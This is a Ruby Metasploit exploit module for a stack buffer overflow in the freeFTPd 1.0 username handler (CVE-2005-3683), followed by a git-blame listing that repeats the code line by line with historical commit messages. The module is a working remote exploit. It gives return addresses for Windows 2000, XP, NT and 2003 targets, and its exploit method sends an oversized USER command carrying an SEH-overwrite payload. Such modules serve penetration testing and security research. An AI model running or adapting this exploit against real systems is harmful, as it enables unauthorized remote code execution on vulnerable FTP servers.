metasploit-framework/modules/exploits/windows/ftp/freeftpd_user.rb

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp
  include Msf::Exploit::Remote::Seh

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'freeFTPd 1.0 Username Overflow',
      'Description'    => %q{
          This module exploits a stack buffer overflow in the freeFTPd
        multi-protocol file transfer service. This flaw can only be
        exploited when logging has been enabled (non-default).
      },
      'Author'         => 'MC',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2005-3683'],
          [ 'OSVDB', '20909'],
          [ 'BID', '15457']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'Space'    => 800,
          'BadChars' => "\x00\x20\x0a\x0d",
          'StackAdjustment' => -3500,
        },
      'Platform'       => %w{ win },
      'Targets'        =>
        [
          [
            'Windows 2000 English ALL',
            {
              'Platform' => 'win',
              'Ret'      => 0x75022ac4,
            },
          ],
          [
            'Windows XP Pro SP0/SP1 English',
            {
              'Platform' => 'win',
              'Ret'      => 0x71aa32ad,
            },
          ],
          [
            'Windows NT SP5/SP6a English',
            {
              'Platform' => 'win',
              'Ret'      => 0x776a1799,
            },
          ],
          [
            'Windows 2003 Server English',
            {
              'Platform' => 'win',
              'Ret'      => 0x7ffc0638,
            },
          ],
        ],
      'DisclosureDate'  => 'Nov 16 2005'
    ))
  end

  def check
    connect
    disconnect
    if (banner =~ /freeFTPd 1\.0/)
      return Exploit::CheckCode::Appears
    end
    return Exploit::CheckCode::Safe
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    buf          = rand_text_english(1816, payload_badchars)
    seh          = generate_seh_payload(target.ret)
    buf[1008, seh.length] = seh

    send_cmd( ['USER', buf] , false)

    handler
    disconnect
  end

end
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`
Fix up comment splats with the correct URI See the complaint on #4039. This doesn't fix that particular issue (it's somewhat unrelated), but does solve around a file parsing problem reported by @void-in 2014-10-17 16:47:33 +00:00			`# This module requires Metasploit: http://metasploit.com/download`
Redo the boilerplate / splat [SeeRM #8496] 2013-10-15 18:50:46 +00:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Adding an Id tag and a standard header to all modules git-svn-id: file:///home/svn/framework3/trunk@4419 4d416f70-5f16-0410-b530-b9f4589650da 2007-02-18 00:10:39 +00:00			`##`

Changed up the way mixins are handled, all exploits just require 'msf/core' and all current mixins will be loaded. Egghunter was moved to a mixin and generates based on target arch and platform. git-svn-id: file:///home/svn/incoming/trunk@3111 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-26 00:04:26 +00:00			`require 'msf/core'`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
use MetasploitModule as a class name 2016-03-08 13:02:44 +00:00			`class MetasploitModule < Msf::Exploit::Remote`
Retab modules 2013-08-30 21:28:54 +00:00			`Rank = AverageRanking`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`include Msf::Exploit::Remote::Ftp`
			`include Msf::Exploit::Remote::Seh`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def initialize(info = {})`
			`super(update_info(info,`
			`'Name' => 'freeFTPd 1.0 Username Overflow',`
			`'Description' => %q{`
			`This module exploits a stack buffer overflow in the freeFTPd`
			`multi-protocol file transfer service. This flaw can only be`
			`exploited when logging has been enabled (non-default).`
			`},`
			`'Author' => 'MC',`
			`'License' => MSF_LICENSE,`
			`'References' =>`
			`[`
			`[ 'CVE', '2005-3683'],`
Revert "Land #6812, remove broken OSVDB references" This reverts commit 2b016e02165b7abf85c6847fcae2b6131f8a504d, reversing changes made to 7b1d9596c7c95097ef750407ff61f010714434a1. 2016-07-15 17:00:31 +00:00			`[ 'OSVDB', '20909'],`
Remove bad references (dead links) These links are no longer available. They are dead links. 2015-10-27 17:41:32 +00:00			`[ 'BID', '15457']`
Retab modules 2013-08-30 21:28:54 +00:00			`],`
			`'Privileged' => false,`
			`'Payload' =>`
			`{`
			`'Space' => 800,`
			`'BadChars' => "\x00\x20\x0a\x0d",`
			`'StackAdjustment' => -3500,`
			`},`
Bug #8419 - Added platform info missing on exploits 2013-10-09 02:41:50 +00:00			`'Platform' => %w{ win },`
Retab modules 2013-08-30 21:28:54 +00:00			`'Targets' =>`
			`[`
			`[`
			`'Windows 2000 English ALL',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x75022ac4,`
			`},`
			`],`
			`[`
			`'Windows XP Pro SP0/SP1 English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x71aa32ad,`
			`},`
			`],`
			`[`
			`'Windows NT SP5/SP6a English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x776a1799,`
			`},`
			`],`
			`[`
			`'Windows 2003 Server English',`
			`{`
			`'Platform' => 'win',`
			`'Ret' => 0x7ffc0638,`
			`},`
			`],`
			`],`
			`'DisclosureDate' => 'Nov 16 2005'`
			`))`
			`end`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def check`
			`connect`
			`disconnect`
			`if (banner =~ /freeFTPd 1\.0/)`
Saving progress Progress group 2: Making sure these checks comply with the new guidelines. Please read: "How to write a check() method" found in the wiki. 2014-01-21 17:07:03 +00:00			`return Exploit::CheckCode::Appears`
Retab modules 2013-08-30 21:28:54 +00:00			`end`
			`return Exploit::CheckCode::Safe`
			`end`
big module whitespace/formatting cleanup pass git-svn-id: file:///home/svn/framework3/trunk@9179 4d416f70-5f16-0410-b530-b9f4589650da 2010-04-30 08:40:19 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`def exploit`
			`connect`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`print_status("Trying target #{target.name}...")`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`buf = rand_text_english(1816, payload_badchars)`
			`seh = generate_seh_payload(target.ret)`
			`buf[1008, seh.length] = seh`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`send_cmd( ['USER', buf] , false)`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
Retab modules 2013-08-30 21:28:54 +00:00			`handler`
			`disconnect`
			`end`
Ported git-svn-id: file:///home/svn/incoming/trunk@3072 4d416f70-5f16-0410-b530-b9f4589650da 2005-11-24 03:48:16 +00:00
See #339. Massive cleanup of author names, make them consistent across modules git-svn-id: file:///home/svn/framework3/trunk@7075 4d416f70-5f16-0410-b530-b9f4589650da 2009-09-27 21:30:45 +00:00			`end`